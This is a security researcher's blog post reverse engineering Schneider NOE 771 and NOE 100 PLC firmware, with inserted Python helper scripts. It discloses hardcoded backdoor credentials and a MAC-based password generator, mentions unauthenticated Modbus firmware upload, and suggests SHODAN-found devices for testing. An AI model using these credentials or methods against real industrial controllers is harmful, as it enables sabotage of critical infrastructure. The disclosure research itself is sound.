Reversemode
Sunday, 19 May 2013
BYTES & WORDS
Project Basecamp - Attacking ControlLogix
(Thursday, 19 January 2012) Written by Rubén
You can download my contribution to Digital Bond's Project Basecamp by clicking on the image. Extracted from the report:

"One of the most time consuming tasks I came across during this research was reading all the technical documentation gathered. Initially this fact may sound weird but it is nothing unusual at all; while researching into industrial devices, which commonly suffer from a lack of strong security measures implemented by design, the hardest part is not learning how to break things but understanding how it really works. Therefore, the key point behind attacking this PLC was not how to circumvent its security but monitoring how the legitimate software performed valid operations in order to mimic them, in addition to the usual dose of reverse engineering and fuzzing to discover the 'secrets' behind the scenes. To sum up, any legit functionality supported by the controller could also be used by a malicious user in a malicious manner. During this 'journey' we have identified problems that can be used to cause a DoS, load a trojanized firmware or leak information. Actually it's not a bug, it's a feature."

I'd say the underlying problem is that some of these 'attacks' are actually features documented in the CIP protocol, so again "any legit functionality supported by the controller could also be used by a malicious user". Within this context, the following article is worth a read: DHS Thinks Some SCADA Problems Are Too Big To Call "Bug"

Congrats to Reid and to all the researchers involved, and thanks to Dale for counting on me for this project. You can watch the following video, showing the results of the "Deep fried controller" exploit.
Reversing Industrial firmware for fun and backdoors I
(Monday, 12 December 2011) Written by Rubén
Update: ICS-CERT alert http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-346-01.pdf
Update: Schneider alert http://www.global-download.schneider-electric.com/85257563005C524A/All/0C7358A0825BD0D2C1257966001F1B90?Opendocument

Hi. Everybody knows I'm committed to hacking into the LHC and then blowing up the world. My first try was 4 months ago; as you can see below this post, I published "The power of reading: the CERN case", where I explained the method used to obtain confidential information about the LHC that led me to 'hack' into CERN (not really). Anyway, if you carefully take a look at the picture that contains some PLC modules, you'll distinguish their names; one of them was "NOE 771". So here I go again...

"NOE 771" devices are manufactured by Schneider Electric and "is the latest model in a line of Quantum Ethernet TCP/IP modules designed to make it possible for a Quantum Programmable Logic Controller (PLC) to communicate with devices over an Ethernet network". Sounds good, doesn't it?

The next logical steps for those poor European independent researchers focused on ICS security are:
- Search via SHODAN to find out whether you'll be able to test some of your findings without having to buy the device.
- Download the firmware to research the device without having it physically.

Both milestones can be achieved without any problem, so now it's time to reverse engineer the firmware! This is what we get after decompressing the main file.

Well, obviously the hardcoded credentials present inside the scripts used to update the firmware through FTP are significant. So is this other hardcoded, and well known, account inside '/wwwroot/classes/SAComm.jar'. Anyway, I was more interested in the firmware, so let's take a look at 'wwwroot\conf\exec\NOE7711.bin'. As usual: header + ZLIB compressed blob.
Once decompressed, the first thing we should do is identify the processor; there is a cool presentation by Igor Skochinsky which you may find useful during this task. It turns out to be PowerPC. After loading it in IDA 6.0 I get this 'sad' scenario. So one more time, the common steps to reconstruct a firmware:
- Collect info from strings
- Fix functions
- Rebase
- Rebuild symbols if possible

First of all, by analyzing the strings, we can identify this image as a VxWorks based firmware. Now it's time to fix the code. Don't panic! A simple IDC script does the magic. Let's take a look at some random prologs of those functions that IDA has already detected. It seems clear we can use "94 21 FF ?" as a pattern to identify additional functions. After running the script we can see how everything looks totally different.

Finding the address to rebase the firmware is a matter of applying certain tricks; during this article we'll see a couple of them. Sometimes the blob where the firmware is embedded contains a header where you can find the base address, or maybe it's even a u-boot image. That isn't the case here, so we have no idea what the base address is; therefore we can use the well-known 'li instructions' trick. It seems we have a winner: 0x10000.

Once rebased, it's time to find the symbols. Commonly, and regardless of the type of firmware you're reversing, a method that works pretty well is finding a fixed structure repeated n times. By inspecting the 'data segment' carefully we can quickly find the symbol table located between 0x00342360 and 0x0036BA60. We'll use the following script to parse it.

OK, we are ready to research the firmware now that it is more human readable. So we can easily follow the VxWorks initialization procedure from the default entry point 'SymInit'. There is a function especially interesting for us: 'usrRoot', which performs an important part of the initialization, spawning additional tasks as well.
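The "fix functions" step above, as an added example (my own Python, not the author's IDC script): it scans a raw big-endian PowerPC image for the `stwu r1,-N(r1)` prologue that the "94 21 FF ?" pattern targets, generalised to any negative displacement, optionally demands the `mflr r0` that follows it in non-leaf functions to cut false positives, and emits IDA 6-era IDC `MakeFunction` calls rebased to the 0x10000 found on the page. The sample image is constructed here, not bytes from NOE7711.bin.

```python
"""Find candidate function starts in a raw big-endian PowerPC firmware image.

Added example, not the author's IDC script. SAMPLE_BLOB is a constructed
image, not bytes from NOE7711.bin.
"""
import struct

STWU_R1_R1 = 0x9421       # stwu rS=1, rA=1: primary opcode 37 with both registers = r1
MFLR_R0 = 0x7C0802A6      # mflr r0, saved right after the frame push in non-leaf functions
BLR = 0x4E800020
NOP = 0x60000000

def find_ppc_prologues(blob: bytes, require_mflr: bool = False) -> list:
    """Return (offset, frame_size) for each 4-byte aligned `stwu r1,-N(r1)`.

    With require_mflr=True a hit only counts when the following word is
    `mflr r0`, which removes most data words that happen to start with 94 21."""
    hits = []
    for off in range(0, len(blob) - 3, 4):
        (word,) = struct.unpack_from(">I", blob, off)
        if (word >> 16) != STWU_R1_R1:
            continue
        disp = word & 0xFFFF
        if disp < 0x8000:                # positive displacement: not a frame push
            continue
        frame = 0x10000 - disp           # two's complement of the signed 16-bit field
        if require_mflr:
            if off + 8 > len(blob):
                continue
            (nxt,) = struct.unpack_from(">I", blob, off + 4)
            if nxt != MFLR_R0:
                continue
        hits.append((off, frame))
    return hits

def idc_lines(prologues: list, base: int) -> list:
    """Turn file offsets into IDA 6-era IDC calls (MakeFunction(start, BADADDR)),
    rebased to the image's load address; 0x10000 is the base found on the page."""
    return ["MakeFunction(0x%X, BADADDR);" % (off + base) for off, _ in prologues]

# Constructed image: two real prologues and one look-alike word at 0x18.
SAMPLE_BLOB = b"".join(struct.pack(">I", w) for w in [
    NOP, NOP,
    0x9421FFD0,   # 0x08: stwu r1,-0x30(r1)  (same frame size as ComputePassword)
    MFLR_R0,      # 0x0C: mflr r0
    0x90010034,   # 0x10: stw r0,0x34(r1)
    BLR,          # 0x14: blr
    0x9421FFFF,   # 0x18: looks like stwu r1,-1(r1) but no mflr follows: a data word
    0x38600001,   # 0x1C: li r3,1
    0x9421FF80,   # 0x20: stwu r1,-0x80(r1)
    MFLR_R0,      # 0x24: mflr r0
    BLR,          # 0x28: blr
])

if __name__ == "__main__":
    for line in idc_lines(find_ppc_prologues(SAMPLE_BLOB, require_mflr=True), 0x10000):
        print(line)
```

On a real image you would run it over the decompressed NOE7711.bin and paste the resulting lines into IDA; the `require_mflr` filter drops leaf functions too, so run both passes and compare.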
telnetInit

http://www-kryo.desy.de/documents/vxWorks/V5.4/vxworks/ref/telnetLib.html#telnetInit
"The telnet daemon, telnetd( ), accepts remote telnet login requests and causes the shell's input and output to be redirected to the remote user. The telnet daemon is started by calling telnetInit( ), which is called automatically when the configuration macro INCLUDE_TELNET is defined."

However, we still need valid credentials to log in.

--SPOILER-- :) There are several hidden accounts allowing remote access via telnet...

Commands accepted by this telnet shell (port 23):

help                              Print this list
ioHelp                            Print I/O utilities help info
dbgHelp                           Print debugger help info
nfsHelp                           Print nfs help info
netHelp                           Print network help info
spyHelp                           Print task histogrammer help info
timexHelp                         Print execution timer help info
h         [n]                     Print (or set) shell history
i         [task]                  Summary of tasks' TCBs
ti        task                    Complete info on TCB for task
sp        adr,args...             Spawn a task, pri=100, opt=0, stk=20000
taskSpawn name,pri,opt,stk,adr,args...  Spawn a task
td        task                    Delete a task
ts        task                    Suspend a task
tr        task                    Resume a task
d         [adr[,nunits[,width]]]  Display memory
m         adr[,width]             Modify memory
mRegs     [reg[,task]]            Modify a task's registers interactively
pc        [task]                  Return task's program counter
Type <CR> to continue, Q to stop:
iam       "user"[,"passwd"]       Set user name and passwd
whoami                            Print user name
devs                              List devices
ld        [syms[,noAbort][,"name"]]  Load stdin, or file, into memory
                                  (syms = add symbols to table:
                                  -1 = none, 0 = globals, 1 = all)
lkup      ["substr"]              List symbols in system symbol table
lkAddr    address                 List symbol table entries near address
checkStack  [task]                List task stack sizes and usage
printErrno  value                 Print the name of a status value
period    secs,adr,args...        Spawn task to call function periodically
repeat    n,adr,args...           Spawn task to call function n times (0=forever)
version                           Print VxWorks version info, and boot l

--SPOILER--

usrSecurity

This looks like valid credentials, though the password is hashed.
You should check out this website to learn how to crack VxWorks passwords: http://cvk.posterous.com/how-to-crack-vxworks-password-hashes

usrWdbInit

The 'infamous' WDB service is active. At this point it's mandatory to recall the research performed by HD Moore on VxWorks; it's really useful to gain a deeper understanding of how the WDB agent and VxWorks hashed passwords can be used as attack vectors.
https://community.rapid7.com/community/metasploit/blog/2010/08/02/shiny-old-vxworks-vulnerabilities

Credential List #1 → AUT_CSE:cQdd9debez (hashed)

usrAppInit

This function is a must, since it's used by the developers to perform their own initialization, so we can assume that it contains interesting things. Let's see:

ROM:0002A00C bl loginInit
ROM:0002A010 addi %r0, %r31, 0x528
ROM:0002A014 lwz %r9, 0x520(%r31)
ROM:0002A018 lbz %r11, 0(%r9)
ROM:0002A01C clrlwi %r9, %r11, 24
ROM:0002A020 lwz %r10, 0x520(%r31)
ROM:0002A024 addi %r11, %r10, 1
ROM:0002A028 lbz %r10, 0(%r11)
ROM:0002A02C clrlwi %r11, %r10, 24
ROM:0002A030 lwz %r8, 0x520(%r31)
ROM:0002A034 addi %r10, %r8, 2
ROM:0002A038 lbz %r8, 0(%r10)
ROM:0002A03C clrlwi %r10, %r8, 24
ROM:0002A040 lwz %r7, 0x520(%r31)
ROM:0002A044 addi %r8, %r7, 3
ROM:0002A048 lbz %r7, 0(%r8)
ROM:0002A04C clrlwi %r8, %r7, 24
ROM:0002A050 lwz %r6, 0x520(%r31)
ROM:0002A054 addi %r7, %r6, 4
ROM:0002A058 lbz %r6, 0(%r7)
ROM:0002A05C clrlwi %r29, %r6, 24
ROM:0002A060 lwz %r6, 0x520(%r31)
ROM:0002A064 addi %r7, %r6, 5
ROM:0002A068 lbz %r6, 0(%r7)
ROM:0002A06C clrlwi %r28, %r6, 24
ROM:0002A070 mr %r3, %r0
ROM:0002A074 lis %r7, ((a_2x_2x_2x_2x_0+0x10000)@h) # "%.2X%.2X%.2X%.2X%.2X%.2X"
ROM:0002A078 addi %r4, %r7, -0x56F4 # a_2x_2x_2x_2x_0
ROM:0002A07C mr %r5, %r9
ROM:0002A080 mr %r6, %r11
ROM:0002A084 mr %r7, %r10
ROM:0002A088 mr %r9, %r29
ROM:0002A08C mr %r10, %r28
ROM:0002A090 bl sprintf
ROM:0002A094 addi %r0, %r31, 0x528
ROM:0002A098 addi %r9, %r31, 0x538
ROM:0002A09C mr %r3, %r0
ROM:0002A0A0 mr %r4, %r9
ROM:0002A0A4 bl ComputePassword
ROM:0002A0A8 addi %r0, %r31, 0x538
ROM:0002A0AC lis %r9, ((aPasswordS+0x10000)@h) # "-----> Password: %s <-----\n"
ROM:0002A0B0 addi %r3, %r9, -0x56D8 # aPasswordS
ROM:0002A0B4 mr %r4, %r0
ROM:0002A0B8 bl printf
ROM:0002A0BC addi %r0, %r31, 0x538
ROM:0002A0C0 mr %r3, %r0
ROM:0002A0C4 lis %r9, unk_374764@h
ROM:0002A0C8 addi %r4, %r9, unk_374764@l
ROM:0002A0CC bl loginDefaultEncrypt
ROM:0002A0D0 lis %r9, ((aFwupgrade+0x10000)@h) # "fwupgrade"
ROM:0002A0D4 addi %r3, %r9, -0x56BC # aFwupgrade
ROM:0002A0D8 lis %r9, unk_374764@h
ROM:0002A0DC addi %r4, %r9, unk_374764@l
ROM:0002A0E0 bl loginUserAdd
ROM:0002A0E4 lis %r9, ((aSysdiag+0x10000)@h) # "sysdiag"
ROM:0002A0E8 addi %r3, %r9, -0x56B0 # aSysdiag
ROM:0002A0EC lis %r9, ((aBbddrdzb9+0x10000)@h) # "bbddRdzb9"
ROM:0002A0F0 addi %r4, %r9, -0x56A8 # aBbddrdzb9
ROM:0002A0F4 bl loginUserAdd
ROM:0002A0F8 lis %r9, ((aNoe77111_v500+0x10000)@h) # "noe77111_v500"
ROM:0002A0FC addi %r3, %r9, -0x569C # aNoe77111_v500
ROM:0002A100 lis %r9, ((aRcsyyebczs+0x10000)@h) # "RcSyyebczS"
ROM:0002A104 addi %r4, %r9, -0x568C # aRcsyyebczs
ROM:0002A108 bl loginUserAdd
ROM:0002A10C lis %r9, ((aFdrusers+0x10000)@h) # "fdrusers"
ROM:0002A110 addi %r3, %r9, -0x5680 # aFdrusers
ROM:0002A114 lis %r9, ((aBrbqyzcy9b+0x10000)@h) # "bRbQyzcy9b"
ROM:0002A118 addi %r4, %r9, -0x5674 # aBrbqyzcy9b
ROM:0002A11C bl loginUserAdd
ROM:0002A120 lis %r9, ((aAutcse+0x10000)@h) # "AUTCSE"
ROM:0002A124 addi %r3, %r9, -0x5668 # aAutcse
ROM:0002A128 lis %r9, ((aRybqrceesd+0x10000)@h) # "RybQRceeSd"
ROM:0002A12C addi %r4, %r9, -0x5660 # aRybqrceesd
ROM:0002A130 bl loginUserAdd
ROM:0002A134 lis %r9, ((aFtpuser+0x10000)@h) # "ftpuser"
ROM:0002A138 addi %r3, %r9, -0x5654 # aFtpuser
ROM:0002A13C lis %r9, ((aRcqbrbzryc+0x10000)@h) # "RcQbRbzRyc"
ROM:0002A140 addi %r4, %r9, -0x564C # aRcqbrbzryc
ROM:0002A144 bl loginUserAdd
ROM:0002A148 lis %r9, ((aUser_0+0x10000)@h) # "USER"
ROM:0002A14C addi %r3, %r9, -0x5640 # aUser_0
ROM:0002A150 lis %r9, ((aCdcs9bcqc+0x10000)@h) # "cdcS9bcQc"
ROM:0002A154 addi %r4, %r9, -0x5638 # aCdcs9bcqc
ROM:0002A158 bl loginUserAdd
ROM:0002A15C lis %r9, ((aNtpupdate+0x10000)@h) # "ntpupdate"
ROM:0002A160 addi %r3, %r9, -0x562C # aNtpupdate
ROM:0002A164 lis %r9, ((aSee9cb9y99+0x10000)@h) # "See9cb9y99"
ROM:0002A168 addi %r4, %r9, -0x5620 # aSee9cb9y99
ROM:0002A16C bl loginUserAdd
ROM:0002A170 bl FTP_User_Add
ROM:0002A174 lis %r9, loginUserVerify@h
ROM:0002A178 addi %r3, %r9, loginUserVerify@l
ROM:0002A17C li %r4, 0
ROM:0002A180 bl ftpdInit

Pretty clear, isn't it? It's adding up to 8 hardcoded accounts. Anyway, a couple of things deserve more attention.

ComputePassword

This function generates a password for the user 'fwupgrade', deriving it from the MAC address, which is obtained by 'GetEthAddr'.

ROM:00029EEC bl GetEthAddr
ROM:00029EF0 mr %r0, %r3
ROM:00029EF4 stw %r0, 0x520(%r31)

ROM:00063E78
ROM:00063E78 # =============== S U B R O U T I N E =======================================
ROM:00063E78
ROM:00063E78 ComputePassword: # CODE XREF: usrAppInit+1D8p
ROM:00063E78 # DATA XREF: ROM:003430E8o
ROM:00063E78
ROM:00063E78 .set var_28, -0x28
ROM:00063E78 .set var_10, -0x10
ROM:00063E78 .set var_C, -0xC
ROM:00063E78 .set var_8, -8
ROM:00063E78 .set var_4, -4
ROM:00063E78 .set arg_4, 4
ROM:00063E78
ROM:00063E78 stwu %sp, -0x30(%sp)
ROM:00063E7C mflr %r0
ROM:00063E80 stw %r28, 0x30+var_10(%sp)
ROM:00063E84 stw %r29, 0x30+var_C(%sp)
ROM:00063E88 stw %r30, 0x30+var_8(%sp)
ROM:00063E8C stw %r31, 0x30+var_4(%sp)
ROM:00063E90 stw %r0, 0x30+arg_4(%sp)
ROM:00063E94 mr %r28, %r3
ROM:00063E98 mr %r29, %r4
ROM:00063E9C mr %r3, %r29
ROM:00063EA0 lis %r4, ((a0x_0+0x10000)@h) # "0x"
ROM:00063EA4 addi %r4, %r4, -0x7578 # a0x_0
ROM:00063EA8 bl strcpy
ROM:00063EAC mr %r3, %r29
ROM:00063EB0 addi %r4, %r28, 3
ROM:00063EB4 bl strcat
ROM:00063EB8 mr %r3, %r29
ROM:00063EBC addi %r4, %sp, 0x30+var_28
ROM:00063EC0 li %r5, 0x10
ROM:00063EC4 bl strtoul
ROM:00063EC8 rotrwi %r5, %r3, 7
ROM:00063ECC xor %r5, %r5, %r3
ROM:00063ED0 mr %r3, %r29
ROM:00063ED4 lis %r4, ((a_8x_0+0x10000)@h) # "%.8x"
ROM:00063ED8 addi %r4, %r4, -0x7574 # a_8x_0
ROM:00063EDC rotrwi %r5, %r5, 9
ROM:00063EE0 bl sprintf
ROM:00063EE4 lwz %r0, 0x30+arg_4(%sp)
ROM:00063EE8 mtlr %r0
ROM:00063EEC lwz %r28, 0x30+var_10(%sp)
ROM:00063EF0 lwz %r29, 0x30+var_C(%sp)
ROM:00063EF4 lwz %r30, 0x30+var_8(%sp)
ROM:00063EF8 lwz %r31, 0x30+var_4(%sp)
ROM:00063EFC addi %sp, %sp, 0x30
ROM:00063F00 blr
ROM:00063F00 # End of function ComputePassword
ROM:00063F00

In C it would be something like this:

/* Schneider NOE 771 fwupgrade pass generator */
/* Based on device's ethernet address */
/* Ruben Santamarta @reversemode */
#include <stdio.h>
#include <stdlib.h>

/* 32-bit rotate right, mirroring the two rotrwi instructions above */
#define ROTR32(x,n) ( ((x) >> (n)) | ((x) << (32 - (n))) )

int main(int argc, char *argv[])
{
    unsigned int a1, a2;
    unsigned int pass;

    if (argc != 2) {
        printf("usage: pass_gen 0xMAC\n");
        exit(0);
    }

    a1 = strtoul(argv[1], NULL, 16);   /* same base-16 parse as the strtoul call in the firmware */
    a2 = ROTR32(a1, 7);
    a2 ^= a1;
    pass = ROTR32(a2, 9);
    printf("fwupgrade:%.8x\n", pass);
    return 0;
}

I've not tested this MAC-based password against a real system, so if someone can confirm it works please let me know. Moreover, by analyzing 'FTP_User_Add' we can find the hardcoded account we identified previously in the scripts.
ROM:0002A730
ROM:0002A730 loc_2A730: # CODE XREF: FTP_User_Add+48j
ROM:0002A730 lis %r9, ((aUser_0+0x10000)@h) # "USER"
ROM:0002A734 addi %r3, %r9, -0x5640 # aUser_0
ROM:0002A738 lis %r9, ((aDeeczesse+0x10000)@h) # "deeczeSSe"
ROM:0002A73C addi %r4, %r9, -0x52F0 # aDeeczesse
ROM:0002A740 bl loginUserAdd
ROM:0002A744
ROM:0002A744 loc_2A744: # CODE XREF: FTP_User_Add+23Cj
ROM:0002A744 lwz %r11, 0x50+var_50(%sp)

By examining the xrefs to 'taskSpawn' we can quickly discover more functionality, including the 'modbus_125_handler' function, which is in charge of updating the firmware via Modbus function code 125... we hadn't mentioned yet that this device speaks Modbus on port 502. So after all, you don't even need valid credentials to compromise the device. Moreover, this kind of handler is a great source to discover how the firmware is formatted: headers, checksum, etc.

Analyzing the NOE 100 Ethernet Module

NOE 100 is pretty much the same as NOE 771. vxWorks_noe100.bin is the firmware: header + ARM VxWorks image. We're basically following the same steps as before to reconstruct it. In order to promptly find the address to rebase it, I came up with this trick, based on jump tables.

1. We search for those jump tables with just a few and 'tiny' cases:

ROM:0001A2F4 B locret_1A30C ; jumptable 0001A2F0 default case
ROM:0001A2F4 ; ---------------------------------------------------------------------------
ROM:0001A2F8 DCD 0x2002A49C ; jump table for switch statement
ROM:0001A2F8 DCD 0x2002A4A4
ROM:0001A2F8 DCD 0x2002A494
ROM:0001A2F8 DCD 0x2002A490
ROM:0001A2F8 DCD 0x2002A4A4
ROM:0001A30C ; ---------------------------------------------------------------------------
ROM:0001A30C
ROM:0001A30C locret_1A30C ; CODE XREF: sub_1A2D4+20j
ROM:0001A30C LDMFD SP, {R4,R11,SP,PC} ; jumptable 0001A2F0 default case
ROM:0001A30C ; End of function sub_1A2D4
ROM:0001A30C
ROM:0001A310 ; ---------------------------------------------------------------------------
ROM:0001A310 LDMFD SP, {R4,R11,SP,LR}
ROM:0001A314 B sub_19FF8
ROM:0001A318 ; ---------------------------------------------------------------------------
ROM:0001A318 LDMFD SP, {R4,R11,SP,LR}
ROM:0001A31C B sub_1A1F0
ROM:0001A320 ; ---------------------------------------------------------------------------
ROM:0001A320 MOV R1, #0xE
ROM:0001A324 BL sub_158DC
ROM:0001A328 MOV R0, R4
ROM:0001A32C BL sub_18EE0
ROM:0001A330 ADD R3, R4, #0x6B00
ROM:0001A334 ADD R3, R3, #0x94
ROM:0001A338 LDR R2, [R3,#8]
ROM:0001A33C MOV R1, #0x6B00
ROM:0001A340 CMP R2, #0
ROM:0001A344 ADD R1, R1, #0x45
ROM:0001A348 MOVNE R3, #1
ROM:0001A34C MOV R0, R4
ROM:0001A350 STRNEB R3, [R4,R1]
ROM:0001A354 LDMNEFD SP, {R4,R11,SP,PC}
ROM:0001A358 BL sub_1A1F0
ROM:0001A35C LDMFD SP, {R4,R11,SP,PC}

2. The jump table is comprised of 5 addresses. Then we look carefully at the distance between the cases, looking for one distance different from the others: between the 4th and 3rd cases there is a difference of 4 bytes, so taking into account that between the 3rd and 2nd the difference is greater, we can connect the 4th case to its right piece of code.
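The gap-matching step above, as an added example in Python (my own script, not the author's): the jump table holds absolute addresses, the case stubs after it sit at known file offsets, and the two sequences must differ by a single constant, so trying each candidate offset for the lowest table entry and checking that every other entry also lands on a candidate recovers that constant. JUMP_TABLE and CASE_OFFSETS are the values from the NOE 100 listing; the helper names are mine.

```python
"""Recover a firmware base address from a jump table.

Added example, not the author's script. JUMP_TABLE and CASE_OFFSETS are
taken from the NOE 100 listing; everything else is mine.
"""

# The five DCDs at ROM:0001A2F8 (duplicates are fine: two cases share a target).
JUMP_TABLE = [0x2002A49C, 0x2002A4A4, 0x2002A494, 0x2002A490, 0x2002A4A4]

# File offsets of the code that follows the table; locret_1A30C is the
# default case but is also a jump-table target, so it belongs here.
CASE_OFFSETS = [0x0001A30C, 0x0001A310, 0x0001A318, 0x0001A320]

def gaps(values):
    """Distances between consecutive distinct sorted values; a gap that occurs
    only once (here the 4-byte one) is what lets you pair a case by eye."""
    s = sorted(set(values))
    return [b - a for a, b in zip(s, s[1:])]

def find_base(table, offsets):
    """Return the constant that maps every distinct table entry onto one of the
    candidate offsets, or None if no such alignment exists. Trying every
    offset for the lowest target makes it independent of table order and
    tolerant of extra candidate offsets."""
    targets = sorted(set(table))
    cands = set(offsets)
    for off in sorted(cands):
        base = targets[0] - off
        if base >= 0 and all(t - base in cands for t in targets):
            return base
    return None

def rebase(offset, base):
    """Virtual address of a file offset once the base is known."""
    return offset + base

if __name__ == "__main__":
    base = find_base(JUMP_TABLE, CASE_OFFSETS)
    print("gaps %s -> base 0x%08X" % (gaps(JUMP_TABLE), base))
```

For a bigger table you would collect candidate offsets from every instruction that directly follows a `; ----` basic-block separator after the table; the brute-force check tolerates the extra ones.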
Therefore, in order to find the base address we just have to do a subtraction: 0x2002A490 - 0x0001A30C = 0x20010184 is the base address.

After reconstructing the symbols (using the same script we used above for the NOE 771) we analyze the main functions.

ROM:2001E190
ROM:2001E190 ; =============== S U B R O U T I N E =======================================
ROM:2001E190
ROM:2001E190 ; Attributes: bp-based frame
ROM:2001E190
ROM:2001E190 usrRoot ; DATA XREF: usrKernelInit+B4o
ROM:2001E190 ; ROM:off_2001CA24o
ROM:2001E190 MOV R12, SP
ROM:2001E194 STMFD SP!, {R5,R6,R11,R12,LR,PC}
ROM:2001E198 SUB R11, R12, #4
ROM:2001E19C MOV R5, R0
ROM:2001E1A0 MOV R6, R1
ROM:2001E1A4 BL usrKernelCoreInit
ROM:2001E1A8 MOV R2, #0xBB0
ROM:2001E1AC MOV R1, R6
ROM:2001E1B0 MOV R0, R5
ROM:2001E1B4 BL memInit
ROM:2001E1B8 MOV R1, R6
ROM:2001E1BC MOV R0, R5
ROM:2001E1C0 BL memPartLibInit
ROM:2001E1C4 BL memInfoInit
ROM:2001E1C8 BL usrSysctlInit
ROM:2001E1CC MOV R1, R6
ROM:2001E1D0 MOV R0, R5
ROM:2001E1D4 BL usrMmuInit
ROM:2001E1D8 BL usrTextProtect
ROM:2001E1DC BL edrSystemDebugModeInit
ROM:2001E1E0 BL sysClkInit
ROM:2001E1E4 BL mathSoftInit
ROM:2001E1E8 BL setLibInit
ROM:2001E1EC BL usrIosCoreInit
ROM:2001E1F0 BL usrKernelExtraInit
ROM:2001E1F4 BL usrIosExtraInit
ROM:2001E1F8 BL sockLibInit
ROM:2001E1FC BL usrNetworkInit
ROM:2001E200 BL selTaskDeleteHookAdd
ROM:2001E204 BL cplusCtorsLink
ROM:2001E208 BL usrCplusLibInit
ROM:2001E20C BL cplusDemanglerInit
ROM:2001E210 BL usrToolsInit
ROM:2001E214 LDMFD SP, {R5,R6,R11,SP,LR}
ROM:2001E218 B usrAppInit
ROM:2001E218 ; End of function usrRoot
ROM:2001E218

usrRoot

ROM:2001E164
ROM:2001E164 ; Attributes: bp-based frame
ROM:2001E164
ROM:2001E164 usrToolsInit ; CODE XREF: usrRoot+80p
ROM:2001E164 MOV R12, SP
ROM:2001E168 STMFD SP!, {R11,R12,LR,PC}
ROM:2001E16C SUB R11, R12, #4
ROM:2001E170 BL timexInit
ROM:2001E174 BL usrLoaderInit
ROM:2001E178 BL usrSymTblInit
ROM:2001E17C BL usrWdbInit
ROM:2001E180 BL usrWindviewInit
ROM:2001E184 BL usrShowInit
ROM:2001E188 LDMFD SP, {R11,SP,LR}
ROM:2001E18C B usrShellInit
ROM:2001E18C ; End of function usrToolsInit
ROM:2001E18C

WDB is enabled.

usrNetworkInit

ROM:2001DAE0
ROM:2001DAE0 usrNetAppInit ; CODE XREF: usrNetworkInit+90p
ROM:2001DAE0
ROM:2001DAE0 var_14 = -0x14
ROM:2001DAE0
ROM:2001DAE0 MOV R12, SP
ROM:2001DAE4 STMFD SP!, {R4,R11,R12,LR,PC}
ROM:2001DAE8 SUB R11, R12, #4
ROM:2001DAEC SUB SP, SP, #4
ROM:2001DAF0 BL usrRemoteAccess
ROM:2001DAF4 LDR R0, =shellParserControl
ROM:2001DAF8 BL telnetdParserSet
ROM:2001DAFC CMN R0, #1
ROM:2001DB00 BEQ loc_2001DBF0
ROM:2001DB04 MOV R0, #1
ROM:2001DB08 MOV R1, #0
ROM:2001DB0C BL telnetdInit
ROM:2001DB10 CMN R0, #1
ROM:2001DB14 BEQ loc_2001DBC8
ROM:2001DB18 MOV R0, #0x17
ROM:2001DB1C BL telnetdStart
ROM:2001DB20 CMN R0, #1
ROM:2001DB24 BEQ loc_2001DBC8
ROM:2001DB28
ROM:2001DB28 loc_2001DB28 ; CODE XREF: usrNetAppInit+F8j
ROM:2001DB28 ; usrNetAppInit+120j
ROM:2001DB28 BL usrSecurity
ROM:2001DB2C MOV R1, #0
ROM:2001DB30 MOV R0, #0x2EC0
ROM:2001DB34 MOV R12, #0xA
ROM:2001DB38 ADD R0, R0, #0x20
ROM:2001DB3C MOV R2, R1
ROM:2001DB40 MOV R3, R1
ROM:2001DB44 STR R12, [SP,#0x14+var_14]
ROM:2001DB48 BL tftpdInit
ROM:2001DB4C CMN R0, #1
ROM:2001DB50 BEQ loc_2001DBDC
ROM:2001DB54 LDR R0, =0x2028C588
ROM:2001DB58 BL strlen
ROM:2001DB5C ADD R0, R0, #1
ROM:2001DB60 BL malloc
ROM:2001DB64 SUBS R4, R0, #0
ROM:2001DB68 BEQ loc_2001DB9C
ROM:2001DB6C LDR R1, =0x2028C588
ROM:2001DB70 BL strcpy
ROM:2001DB74 MOV R0, R4
ROM:2001DB78 B loc_2001DB84
ROM:2001DB7C ; ---------------------------------------------------------------------------
ROM:2001DB7C
ROM:2001DB7C loc_2001DB7C ; CODE XREF: usrNetAppInit+B0j
ROM:2001DB7C BL tftpdDirectoryAdd
ROM:2001DB80 MOV R0, #0
ROM:2001DB84
ROM:2001DB84 loc_2001DB84 ; CODE XREF: usrNetAppInit+98j
ROM:2001DB84 LDR R1, =0x2028C594
ROM:2001DB88 BL strtok
ROM:2001DB8C CMP R0, #0
ROM:2001DB90 BNE loc_2001DB7C
ROM:2001DB94 MOV R0, R4
ROM:2001DB98 BL free
ROM:2001DB9C
ROM:2001DB9C loc_2001DB9C ; CODE XREF: usrNetAppInit+88j
ROM:2001DB9C ; usrNetAppInit+10Cj
ROM:2001DB9C LDR R1, =loginUserVerify
ROM:2001DBA0 MOV R2, #0
ROM:2001DBA4 LDR R0, =0x2028C598
ROM:2001DBA8 BL ftpd6Init
ROM:2001DBAC BL ftpd6EnableSecurity
ROM:2001DBB0 BL ftpd6EnableSecurity
ROM:2001DBB4 BL usrFtpInit
ROM:2001DBB8 BL usrSntpcInit
ROM:2001DBBC BL pingLibInit
ROM:2001DBC0 LDMFD SP, {R3,R4,R11,SP,LR}
ROM:2001DBC4 B usrSnmpCfgInit
ROM:2001DBC8 ; ---------------------------------------------------------------------------
ROM:2001DBC8
ROM:2001DBC8 loc_2001DBC8 ; CODE XREF: usrNetAppInit+34j
ROM:2001DBC8 ; usrNetAppInit+44j
ROM:2001DBC8 BL __errno

ROM:2001CB3C
ROM:2001CB3C usrSecurity ; CODE XREF: usrNetAppInit:loc_2001DB28p
ROM:2001CB3C MOV R12, SP
ROM:2001CB40 STMFD SP!, {R11,R12,LR,PC}
ROM:2001CB44 SUB R11, R12, #4
ROM:2001CB48 BL loginInit
ROM:2001CB4C LDR R1, =0x2028C2DC ; RcQbRbzRyc
ROM:2001CB50 LDR R0, =0x2028C2E8 ; target
ROM:2001CB54 BL loginUserAdd
ROM:2001CB58 LDR R3, =0x2038E774
ROM:2001CB5C LDR R1, [R3]
ROM:2001CB60 ANDS R1, R1, #0x20
ROM:2001CB64 LDR R0, =loginPrompt2
ROM:2001CB68 LDMNEFD SP, {R11,SP,PC}
ROM:2001CB6C LDMFD SP, {R11,SP,LR}
ROM:2001CB70 B shellLoginInstall
ROM:2001CB70 ; End of function usrSecurity
ROM:2001CB70
ROM:2001CB70

Another hardcoded credential -> target:RcQbRbzRyc

Via XRefs to 'loginUserAdd'

ethernetInit

ROM:200701B8
ROM:200701B8 loc_200701B8 ; CODE XREF: ethernetInit+128j
ROM:200701B8 LDR R1, =0x203C572A
